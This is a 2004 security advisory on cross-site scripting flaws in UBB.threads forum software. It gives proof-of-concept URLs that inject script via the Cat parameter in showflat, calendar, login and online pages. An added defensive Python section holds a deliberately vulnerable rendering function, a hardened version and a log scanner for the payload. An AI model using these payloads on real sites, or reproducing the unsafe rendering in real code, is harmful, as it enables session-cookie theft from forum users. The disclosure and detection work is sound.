Message-ID: <64135.217.83.135.119.1102930873.squirrel@webmail.catholic.org>
From: girl at catholic.org (gp)
Subject: Multiple XSS Vulnerabilities in several UBB.Thread Versions
Vendor: Infopop
URL: http://www.infopop.com/
Tested versions: 6.2.3 & 6.5
Remote: yes
Vendor notified: 06 Dec 2004 at 01:08 AM
Vendor response: 06/07 Dec 2004 01:33 AM/06:08 PM
Update status: in process
============================================================
Summary:
~~~~~~~
UBB.threads is a high-end forum system built on PHP and MySQL
with many features.
A cross-site scripting vulnerability in both tested products
(6.2.3 & 6.5) allows malicious users to steal session cookies;
other versions are probably vulnerable as well.
============================================================
Examples in Version 6.2.3:
~~~~~~~~~~~~~~~~~~~~~~~~~~
[forum]/showflat.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));
Tested modules are:
main, search, newuser, login, online, faq, etc.
Note:
~~~~
Some of these were fixed in version 6.5.
The ones that remain unfixed follow.
============================================================
Examples in version 6.5:
~~~~~~~~~~~~~~~~~~~~~~~~
[forum]/calendar.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));
[forum]/login.php?Cat=[XSS payload, see above]
and:
[forum]/online.php?Cat=[XSS payload, see above]
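As an added example (not code from the advisory, from Infopop or from UBB.threads): the pattern behind these reports and how a defender handles it. The application's real template is not on the page; the block assumes, because the PoC is bare JavaScript rather than HTML, that the `Cat` parameter is echoed straight into a `<script>` block. It shows that vulnerable rendering next to a hardened version that accepts only a numeric category id, and a small scanner that flags requests in constructed Apache-style log lines whose `Cat` value is not numeric and decodes them so the analyst sees what the application received. Hosts, timestamps and paths in the log lines are invented; the payload string is the one from this advisory.

```python
import json
import re
from urllib.parse import unquote, urlsplit

# Payload copied from the advisory's PoC; everything else here is constructed.
ADVISORY_PAYLOAD = (
    'document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B'
    '%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));'
)

# A category id is a small positive integer; anything else is not a valid Cat.
CAT_ID = re.compile(r"[0-9]{1,9}")


def render_vulnerable(cat: str) -> str:
    """Assumed bug: the raw ?Cat= value lands verbatim inside a <script> block,
    so any JavaScript statement passed as Cat runs in the victim's browser."""
    return "<script>var cat = " + cat + ";</script>"


def is_valid_cat(cat: str) -> bool:
    """Whitelist check: only digits, so no quotes, tags or statements get through."""
    return CAT_ID.fullmatch(cat) is not None


def render_hardened(cat: str) -> str:
    """Reject non-numeric ids and emit the value as a JSON/JS literal.
    Validation is the control; json.dumps makes the emitted token a literal."""
    if not is_valid_cat(cat):
        raise ValueError("Cat must be a numeric category id")
    return "<script>var cat = " + json.dumps(int(cat)) + ";</script>"


# --- detection over access logs --------------------------------------------
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+')


def suspicious_cat(path: str):
    """Return the URL-decoded Cat value when it is not a plain integer, else None.
    The query is split by hand because parse_qs treated ';' as a separator in
    older Python versions, which would truncate exactly this kind of payload."""
    query = urlsplit(path).query
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name != "Cat" or value == "":
            continue
        if is_valid_cat(value):
            return None
        # One decode gives what the PHP side saw in $_GET['Cat'].
        return unquote(value)
    return None


def scan_log(lines):
    """Return (client_ip, script_name, decoded_cat) for each flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group(1).replace('\\"', '"')  # undo Apache's quoting of embedded "
        payload = suspicious_cat(path)
        if payload is not None:
            client = line.split(" ", 1)[0]
            script = urlsplit(path).path.rsplit("/", 1)[-1]
            hits.append((client, script, payload))
    return hits


def _log_line(client: str, when: str, path: str) -> str:
    """Build a constructed Apache combined-format line, quoting '"' like Apache does."""
    return (client + " - - [" + when + '] "GET ' + path.replace('"', '\\"')
            + ' HTTP/1.1" 200 8123 "-" "Mozilla/5.0"')


# Constructed sample log: one benign request, two with the advisory payload.
SAMPLE_LOG = [
    _log_line("203.0.113.7", "13/Dec/2004:10:01:02 +0100",
              "/ubbthreads/showflat.php?Cat=12&Number=345"),
    _log_line("203.0.113.7", "13/Dec/2004:10:01:09 +0100",
              "/ubbthreads/showflat.php?Cat=" + ADVISORY_PAYLOAD),
    _log_line("198.51.100.4", "13/Dec/2004:10:02:30 +0100",
              "/ubbthreads/calendar.php?Cat=" + ADVISORY_PAYLOAD),
]

if __name__ == "__main__":
    for client, script, payload in scan_log(SAMPLE_LOG):
        print(client, script, repr(payload))
    print(render_hardened("12"))
```

The scanner keys on the simplest invariant the advisory gives us, that `Cat` is a category id, rather than on a signature for `<SCRIPT>` or `document.write`; encoded or obfuscated variants of the same payload fail the numeric check just as plainly, and the decoded value is kept in the hit so the analyst can confirm it.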
============================================================
Vendor:
~~~~~
The vulnerabilities will be fixed in the next release,
version 6.5.1. Since March 2004, Infopop no longer offers
support for any version of UBB.classic or UBB.threads
prior to version 6.0.
http://www.infopop.com/
http://www.ubbcentral.com/
============================================================
Credits:
~~~~~
dw.; ms.; etc.
--
kind regards
g@cat <-> MM